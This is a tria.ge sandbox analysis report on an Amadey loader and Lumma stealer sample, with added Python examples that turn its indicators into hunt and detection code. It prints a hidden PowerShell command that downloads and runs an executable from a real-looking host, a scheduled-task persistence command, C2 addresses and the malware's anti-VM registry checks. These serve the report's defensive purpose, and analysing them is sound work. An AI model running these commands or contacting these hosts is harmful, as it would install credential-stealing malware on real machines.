Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 149s
max time network: 161s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 14/03/2025, 04:43
Static task: static1
Behavioral task: behavioral1
  Sample: 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
  Resource: win10v2004-20250313-en
General
Target: 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
Size: 938KB
MD5: 23abb2c0ef0f3dc30270a9afd6b27530
SHA1: aa4fd27820b03a511ebac7b3ee05a95dce3c2c52
SHA256: 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373
SHA512: 2f194dea83725bf08837c0ac938efaf015a079f7c59f90e770efec2553f75e2e2cedf899575e5b9194a7b99378177194302cbb2acc9f80557dce5eace5216b8d
SSDEEP: 24576:5qDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:5TvC/MTQYxsWR7a0X
Malware Config
Extracted: URL (the file fetched by the PowerShell stage in the process tree)
  http://176.113.115.7/mine/random.exe
Extracted: amadey
  version: 5.21
  092155
  http://176.113.115.6
  install_dir: bb556cff4a
  install_file: rapes.exe
  strings_key: a131b127e996a898cd19ffb2d92e481b
  url_paths: /Ni9kiput/index.php
Extracted: lumma
  https://kbracketba.shop/api
  https://featureccus.shop/api
  https://mrodularmall.top/api
  https://jowinjoinery.icu/api
  https://legenassedk.top/api
  https://htardwarehu.icu/api
  https://cjlaspcorne.icu/api
  https://bugildbett.top/api
  https://latchclan.shop/api
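The extracted configuration only becomes useful once it is turned into things a hunt can match. The Python below is an added example (not part of the Triage report and not code from either malware family): it copies the extracted values, assembles the host paths and the Amadey check-in URL, and matches a few constructed proxy-log lines against them. Two rules are assumptions drawn from this run alone and should be re-checked against other samples: the install path is %LOCALAPPDATA%\Temp\<install_dir>\<install_file> (observed here as ...\Temp\bb556cff4a\rapes.exe), and the check-in URL is the C2 base plus url_paths; the .job file being named after install_file is likewise only what this run showed (C:\Windows\Tasks\rapes.job).

```python
r"""Turn the extracted Amadey/Lumma configuration into hunt artefacts and scan a log for them.

Added example, not part of the Triage report. Config values are copied from the
report. Assumed (inferred from this run only): install path is
%LOCALAPPDATA%\Temp\<install_dir>\<install_file>; check-in URL is <c2> + <url_path>;
the .job file mirrors install_file. The proxy log lines are constructed.
"""
from urllib.parse import urlparse

AMADEY = {
    "version": "5.21",
    "id": "092155",
    "c2": ["http://176.113.115.6"],
    "install_dir": "bb556cff4a",
    "install_file": "rapes.exe",
    "url_paths": ["/Ni9kiput/index.php"],
}

LUMMA_C2 = [
    "https://kbracketba.shop/api", "https://featureccus.shop/api",
    "https://mrodularmall.top/api", "https://jowinjoinery.icu/api",
    "https://legenassedk.top/api", "https://htardwarehu.icu/api",
    "https://cjlaspcorne.icu/api", "https://bugildbett.top/api",
    "https://latchclan.shop/api",
]

STAGE1_URL = "http://176.113.115.7/mine/random.exe"  # fetched by the PowerShell stage


def amadey_host_iocs(cfg, local_appdata=r"%LOCALAPPDATA%"):
    """File paths to sweep for (assumed layout, see module docstring)."""
    exe = rf"{local_appdata}\Temp\{cfg['install_dir']}\{cfg['install_file']}"
    job = rf"C:\Windows\Tasks\{cfg['install_file'].rsplit('.', 1)[0]}.job"
    return [exe, job]


def amadey_checkin_urls(cfg):
    """C2 base joined with each url_path (assumed check-in URL shape)."""
    return [base.rstrip("/") + path for base in cfg["c2"] for path in cfg["url_paths"]]


def network_indicators(cfg, lumma, stage1):
    """host -> label. Hosts alone match DNS/CONNECT logs; HTTP lines carry the full URL too."""
    hosts = {urlparse(stage1).hostname: "stage1 downloader"}
    for u in amadey_checkin_urls(cfg):
        hosts[urlparse(u).hostname] = "amadey c2"
    for u in lumma:
        hosts[urlparse(u).hostname] = "lumma c2"
    return hosts


def _target_host(target):
    """Accept a full URL (GET/POST) or host:port (CONNECT)."""
    if "://" in target:
        return urlparse(target).hostname
    return target.rsplit(":", 1)[0]


def scan_proxy_log(lines, hosts):
    """lines: 'timestamp client method target status'. Returns (timestamp, client, label, target)."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        ts, client, _method, target, _status = parts[:5]
        label = hosts.get(_target_host(target))
        if label:
            hits.append((ts, client, label, target))
    return hits


# Constructed sample proxy log, not taken from the report.
SAMPLE_LOG = [
    "2025-03-14T04:44:01Z 10.0.0.23 GET http://176.113.115.7/mine/random.exe 200",
    "2025-03-14T04:44:09Z 10.0.0.23 POST http://176.113.115.6/Ni9kiput/index.php 200",
    "2025-03-14T04:44:30Z 10.0.0.23 CONNECT mrodularmall.top:443 200",
    "2025-03-14T04:45:00Z 10.0.0.23 GET http://example.com/ 200",
]

if __name__ == "__main__":
    print(amadey_host_iocs(AMADEY))
    print(amadey_checkin_urls(AMADEY))
    for hit in scan_proxy_log(SAMPLE_LOG, network_indicators(AMADEY, LUMMA_C2, STAGE1_URL)):
        print(*hit)
```

Host-level matching is deliberate: the Lumma domains are only reachable over TLS, so a proxy or DNS log sees the hostname, not the /api path. The Amadey check-in is plain HTTP, so the full URL can be matched there if the log keeps it.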
Signatures
- Amadey family
- Lumma family

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | b418752ed2.exe

Blocklisted process makes network request (1 IoCs)
flow | pid | Process
4 | 2336 | powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Runs PowerShell with the display window hidden (-WindowStyle Hidden).
pid | Process
2336 | powershell.exe

Downloads MZ/PE file (2 IoCs)
flow | pid | Process
4 | 2336 | powershell.exe
7 | 844 | rapes.exe

Checks BIOS information in registry (2 TTPs, 6 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | b418752ed2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | b418752ed2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE

Executes dropped EXE (3 IoCs)
pid | Process
2884 | Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE
844 | rapes.exe
2180 | b418752ed2.exe

Identifies Wine through registry keys (2 TTPs, 3 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine | Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE
Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine | rapes.exe
Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine | b418752ed2.exe
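The three registry-based signatures above (the VirtualBox ACPI table key, the BIOS version values and HKCU\Software\Wine) are the same hand-rolled environment checks, performed by every stage from the dropped loader onward. As an added example that is not part of the report, the Python below normalises Triage's kernel object paths to the HKLM/HKU form most endpoint telemetry uses, maps each access to a technique, and flags processes that combine two or more checks; on this run's rows it singles out the three dropped executables and ignores the NLS\Language lookups. The rule set, the two-technique threshold and the event rows (copied from the IoC tables above) are the example's own.

```python
r"""Classify registry accesses as sandbox/VM-evasion checks and flag the processes making them.

Added example, not part of the Triage report. SAMPLE_EVENTS is constructed from the
report's IoC tables, in the kernel object-path form Triage prints
(\REGISTRY\MACHINE\..., \REGISTRY\USER\<SID>\...); the rules and the threshold are
the example's own.
"""
import re
from collections import defaultdict

# Kernel object-path roots -> the hive prefixes Sysmon/EDR telemetry uses.
_ROOTS = (
    (re.compile(r"^\\REGISTRY\\MACHINE\\", re.I), "HKLM\\"),
    (re.compile(r"^\\REGISTRY\\USER\\", re.I), "HKU\\"),
)

# technique label -> pattern over the normalised path. The Wine rule accepts any
# S-1-5-21 account SID so it is not tied to this sandbox's user.
RULES = (
    ("vm_acpi_vbox", re.compile(r"^HKLM\\HARDWARE\\ACPI\\DSDT\\VBOX__", re.I)),
    ("bios_fingerprint", re.compile(r"^HKLM\\HARDWARE\\DESCRIPTION\\System\\(System|Video)BiosVersion$", re.I)),
    ("wine_detect", re.compile(r"^HKU\\S-1-5-21-[\d-]+\\Software\\Wine$", re.I)),
)


def normalize_key(path):
    r"""\REGISTRY\MACHINE\X -> HKLM\X and \REGISTRY\USER\X -> HKU\X; anything else unchanged."""
    for pat, prefix in _ROOTS:
        m = pat.match(path)
        if m:
            return prefix + path[m.end():]
    return path


def classify(key):
    """Techniques a single key access indicates (usually zero or one)."""
    k = normalize_key(key)
    return [name for name, pat in RULES if pat.search(k)]


def evasion_profile(events):
    """events: iterable of (process, operation, key). Returns {process: set(techniques)}."""
    profile = defaultdict(set)
    for proc, _operation, key in events:
        for technique in classify(key):
            profile[proc].add(technique)
    return dict(profile)


def flag_loaders(profile, min_techniques=2):
    """Processes combining several environment checks: the loader stage, not ordinary activity."""
    return sorted(p for p, techs in profile.items() if len(techs) >= min_techniques)


# Constructed from the report's IoC tables, one row per listed access.
_L = "Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE"
_SID = "S-1-5-21-3290804112-2823094203-3137964600-1000"
SAMPLE_EVENTS = [
    (_L, "Key opened", r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__"),
    ("rapes.exe", "Key opened", r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__"),
    ("b418752ed2.exe", "Key opened", r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__"),
    (_L, "Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion"),
    ("rapes.exe", "Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion"),
    ("rapes.exe", "Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion"),
    ("b418752ed2.exe", "Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion"),
    ("b418752ed2.exe", "Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion"),
    (_L, "Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion"),
    (_L, "Key opened", rf"\REGISTRY\USER\{_SID}\Software\Wine"),
    ("rapes.exe", "Key opened", rf"\REGISTRY\USER\{_SID}\Software\Wine"),
    ("b418752ed2.exe", "Key opened", rf"\REGISTRY\USER\{_SID}\Software\Wine"),
    # Control rows: a language lookup is discovery, not an evasion check.
    ("mshta.exe", "Key opened", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language"),
    ("powershell.exe", "Key opened", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language"),
]

if __name__ == "__main__":
    prof = evasion_profile(SAMPLE_EVENTS)
    for proc, techs in sorted(prof.items()):
        print(f"{proc}: {sorted(techs)}")
    print("flagged:", flag_loaders(prof))
```

The same three keys are also the ones to check when hardening an analysis VM: a DSDT table named VBOX__, a SystemBiosVersion or VideoBiosVersion string naming the hypervisor, or a leftover HKCU\Software\Wine key gives the loader exactly what it is looking for.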
Loads dropped DLL (3 IoCs)
pid | Process
2336 | powershell.exe
2884 | Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE
844 | rapes.exe

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk, where infostealers often target it.

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Suspicious use of NtSetInformationThreadHideFromDebugger (3 IoCs)
pid | Process
2884 | Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE
844 | rapes.exe
2180 | b418752ed2.exe

Drops file in Windows directory (1 IoCs)
description | ioc | Process
File created | C:\Windows\Tasks\rapes.job | Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 8 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | b418752ed2.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rapes.exe

Modifies Internet Explorer settings
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe

Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
316 | schtasks.exe

Suspicious behavior: EnumeratesProcesses (10 IoCs)
pid | Process
2336 | powershell.exe (x3)
2884 | Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE
844 | rapes.exe
2180 | b418752ed2.exe (x5)

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2336 | powershell.exe

Suspicious use of FindShellTrayWindow (4 IoCs)
pid | Process
2876 | 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe (x3)
2884 | Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE

Suspicious use of SendNotifyMessage (3 IoCs)
pid | Process
2876 | 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe (x3)

Suspicious use of WriteProcessMemory (28 IoCs; each parent wrote to its child four times)
description | pid | Process | procid_target
PID 2876 wrote to memory of 2364 (x4) | 2876 | 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe | 31
PID 2876 wrote to memory of 2396 (x4) | 2876 | 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe | 32
PID 2364 wrote to memory of 316 (x4) | 2364 | cmd.exe | 34
PID 2396 wrote to memory of 2336 (x4) | 2396 | mshta.exe | 35
PID 2336 wrote to memory of 2884 (x4) | 2336 | powershell.exe | 37
PID 2884 wrote to memory of 844 (x4) | 2884 | Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE | 38
PID 844 wrote to memory of 2180 (x4) | 844 | rapes.exe | 40
Processes (indentation shows parent/child depth)

C:\Users\Admin\AppData\Local\Temp\853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe (PID 2876)
  Command line: "C:\Users\Admin\AppData\Local\Temp\853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe (PID 2364)
    Command line: C:\Windows\system32\cmd.exe /c schtasks /create /tn FwUOTmaEbZQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\YjXHg5W4b.hta" /sc minute /mo 25 /ru "Admin" /f
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\schtasks.exe (PID 316)
      Command line: schtasks /create /tn FwUOTmaEbZQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\YjXHg5W4b.hta" /sc minute /mo 25 /ru "Admin" /f
      - System Location Discovery: System Language Discovery
      - Scheduled Task/Job: Scheduled Task

  C:\Windows\SysWOW64\mshta.exe (PID 2396)
    Command line: mshta C:\Users\Admin\AppData\Local\Temp\YjXHg5W4b.hta
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2336)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
      Note: $env:temp is concatenated with the file name without a backslash, so the download is written to C:\Users\Admin\AppData\Local\Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE, a file next to the Temp folder rather than inside it; this is the path of the child process below.
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Downloads MZ/PE file
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Local\Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE (PID 2884)
        Command line: "C:\Users\Admin\AppData\Local\Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Loads dropped DLL
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe (PID 844)
          Command line: "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          - Identifies VirtualBox via ACPI registry values (likely anti-VM)
          - Downloads MZ/PE file
          - Checks BIOS information in registry
          - Executes dropped EXE
          - Identifies Wine through registry keys
          - Loads dropped DLL
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory

          C:\Users\Admin\AppData\Local\Temp\10206880101\b418752ed2.exe (PID 2180)
            Command line: "C:\Users\Admin\AppData\Local\Temp\10206880101\b418752ed2.exe"
            - Identifies VirtualBox via ACPI registry values (likely anti-VM)
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Identifies Wine through registry keys
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
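The process tree carries the two indicators worth pulling out by machine: the scheduled task (mshta running an .hta from %TEMP% every 25 minutes as Admin) and the hidden-window PowerShell download cradle. The Python below is an added example, not part of the report: it tokenises the Windows command lines as printed above, extracts the schtasks options and the WebClient URL and destination, and reproduces PowerShell's plain string concatenation to show where the payload actually landed. The parsing logic, the script-host list and the assumed %TEMP% value (C:\Users\Admin\AppData\Local\Temp, implied by the report's paths) are the example's own.

```python
r"""Extract persistence and download-cradle indicators from process command lines.

Added example, not part of the Triage report. SAMPLE_CMDLINES are the command lines
shown in the report's process tree; the parsing and scoring logic is the example's
own, and TEMP_DIR is the %TEMP% value implied by the report's paths (an assumption).
"""
import re

TOKEN = re.compile(r'"[^"]*"|\S+')
URL = re.compile(r"""https?://[^\s'"<>()]+""")
SCRIPT_HOSTS = ("mshta", "powershell", "wscript", "cscript", "rundll32", "regsvr32")
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)
TEMP_DIR = r"C:\Users\Admin\AppData\Local\Temp"  # assumed %TEMP% of the sandbox user


def tokens(cmd):
    """Split a Windows command line, keeping quoted arguments whole and unquoted."""
    return [t.strip('"') for t in TOKEN.findall(cmd)]


def parse_schtasks(cmd):
    """Return the task definition from a 'schtasks /create' line, or None."""
    toks = tokens(cmd)
    low = [t.lower() for t in toks]
    if not any(t.endswith(("schtasks", "schtasks.exe")) for t in low) or "/create" not in low:
        return None
    # /switch value pairs; bare switches such as /f take no value.
    opts = {}
    for i, t in enumerate(low):
        if t.startswith("/") and i + 1 < len(toks) and not low[i + 1].startswith("/"):
            opts[t] = toks[i + 1]
    action = opts.get("/tr", "")
    schedule = opts.get("/sc", "").lower()
    interval_min = None
    if schedule == "minute":
        interval_min = int(opts.get("/mo", "1"))
    elif schedule == "hourly":
        interval_min = 60 * int(opts.get("/mo", "1"))
    reasons = []
    host = action.split()[0].lower() if action else ""
    if any(h in host for h in SCRIPT_HOSTS):
        reasons.append(f"task action runs script host {host}")
    if USER_WRITABLE.search(action):
        reasons.append("task action points into a user-writable directory")
    if interval_min is not None and interval_min <= 60:
        reasons.append(f"re-runs every {interval_min} minutes")
    return {"name": opts.get("/tn"), "action": action, "run_as": opts.get("/ru"),
            "interval_min": interval_min, "reasons": reasons}


def parse_powershell_cradle(cmd, temp_dir=TEMP_DIR):
    """Return download-cradle details from a PowerShell command line, or None."""
    low = cmd.lower()
    if "powershell" not in low:
        return None
    reasons = []
    if re.search(r"-w(indowstyle)?\s+hidden", low):
        reasons.append("hidden window")
    if ".downloadfile(" in low or ".downloadstring(" in low:
        reasons.append("WebClient download")
    if re.search(r"start-process|invoke-expression|\biex\b|invoke-item", low):
        reasons.append("executes the downloaded payload")
    dest = None
    m = re.search(r"\$env:temp\s*\+\s*'([^']+)'", cmd, re.I)
    if m:
        literal = m.group(1)
        dest = temp_dir + literal  # PowerShell appends the literal verbatim, separator or not
        if not literal.startswith("\\"):
            reasons.append("no path separator after $env:temp: file lands beside %TEMP%, not inside it")
    return {"urls": URL.findall(cmd), "dest": dest, "reasons": reasons}


def triage(cmdlines):
    """Run both parsers over (pid, command line) pairs; return findings keyed by pid."""
    findings = {}
    for pid, cmd in cmdlines:
        task = parse_schtasks(cmd)
        cradle = parse_powershell_cradle(cmd)
        if task and task["reasons"]:
            findings[pid] = ("persistence", task)
        elif cradle and cradle["reasons"]:
            findings[pid] = ("download-cradle", cradle)
    return findings


# Command lines as printed in the report's process tree.
SAMPLE_CMDLINES = [
    (2876, r'"C:\Users\Admin\AppData\Local\Temp\853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe"'),
    (2364, r'C:\Windows\system32\cmd.exe /c schtasks /create /tn FwUOTmaEbZQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\YjXHg5W4b.hta" /sc minute /mo 25 /ru "Admin" /f'),
    (316, r'schtasks /create /tn FwUOTmaEbZQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\YjXHg5W4b.hta" /sc minute /mo 25 /ru "Admin" /f'),
    (2396, r'mshta C:\Users\Admin\AppData\Local\Temp\YjXHg5W4b.hta'),
    (2336, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''),
]

if __name__ == "__main__":
    for pid, (kind, detail) in sorted(triage(SAMPLE_CMDLINES).items()):
        print(pid, kind, detail)
```

The computed destination, C:\Users\Admin\AppData\Local\Temp4NO4LEKHBUSSLZQWICX1CMV89IJBCIQX.EXE, is exactly the image path of PID 2884 in the tree, so a file-path hunt scoped to %TEMP% would have missed it; sweep the parent of %TEMP% as well when the cradle builds its path this way.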
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (3)
    Credentials In Files (3)
Downloads

Filesize: 2.0MB
MD5: 3321797daf023e3d8c99b833bcebe058
SHA1: 1bee929772b85bc04e790455d816736f8c8b46c2
SHA256: 3938663fc81b2f8aafe2ad8b2eb4ce1e671a2260437a19aebd9830f5b0818d0c
SHA512: 4685b8962f400c40821e92ca2f6385c19b80ded649f8c171f0c780ec2c511a5cbab398c49370e69fec3baf11b0ad05ede428017d9b226ab3f0e3f423538e8fb7

Filesize: 717B
MD5: 1231858a870049ae4d76a8166f90551c
SHA1: 58233a05e024ef11dc121dd4da91cb54a466ff7f
SHA256: 0ed2e67d5d1b95b0bf7e58c3d2ade7c7651b68e674cab0d1f24c002a5bb63768
SHA512: 852fe05e35d4ca5c249a10dc37ba611702e54e9791ea94ced88cf4658a6d3387616385ddb18a28d8c22957512488a4dd5c63187f18a5ee9778b0a91c47965833

Filesize: 2.1MB
MD5: 0a292f073a6184fed639e127c134fc6e
SHA1: dc2af660616616c531ad1e2f960aa86c615d6072
SHA256: d9ae087614383e661306c3c77f6186feb9100f6d0a5b33c2f6d72348280af763
SHA512: 0b6181b42d037d12c56e390dccb2c7b2f8c9d6ca808a7f35ba96322d87c1d56924ad60afa02a873324ceda2691d2be494a88a63fdc43c95467676b02fdbb5e52